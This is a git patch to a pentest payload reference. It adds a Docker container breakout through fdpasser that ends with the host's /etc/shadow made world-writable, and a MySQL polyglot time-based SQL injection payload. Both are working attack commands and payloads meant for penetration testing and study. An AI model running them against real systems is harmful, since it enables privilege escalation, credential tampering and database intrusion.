From 5b1a79cb56ce5b8de6c9b2458d87f800c6dfd78f Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 4 Jul 2020 19:00:56 +0200 Subject: [PATCH] Docker device file breakout --- .../Container - Docker Pentest.md | 11 +++++++++++ SQL Injection/README.md | 3 +++ 2 files changed, 14 insertions(+) diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index 55b3cb3..b8faaa3 100644 --- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md @@ -10,6 +10,7 @@ - [Insecure Docker Registry](#insecure-docker-registry) - [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1) - [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc) +- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file) - [References](#references) ## Tools @@ -164,6 +165,16 @@ $ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicio $ docker run --rm cve-2019-5736:malicious_image_POC ``` +## Breaking out of containers using a device file + +```powershell +https://github.com/FSecureLABS/fdpasser +In container, as root: ./fdpasser recv /moo /etc/shadow +Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo +Outside container: ls -la /etc/shadow +Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow +``` + ## References - [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 353feca..693ed56 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -387,6 +387,9 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj. ```sql SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ + +/* MySQL only */ +IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ ``` ## Routed injection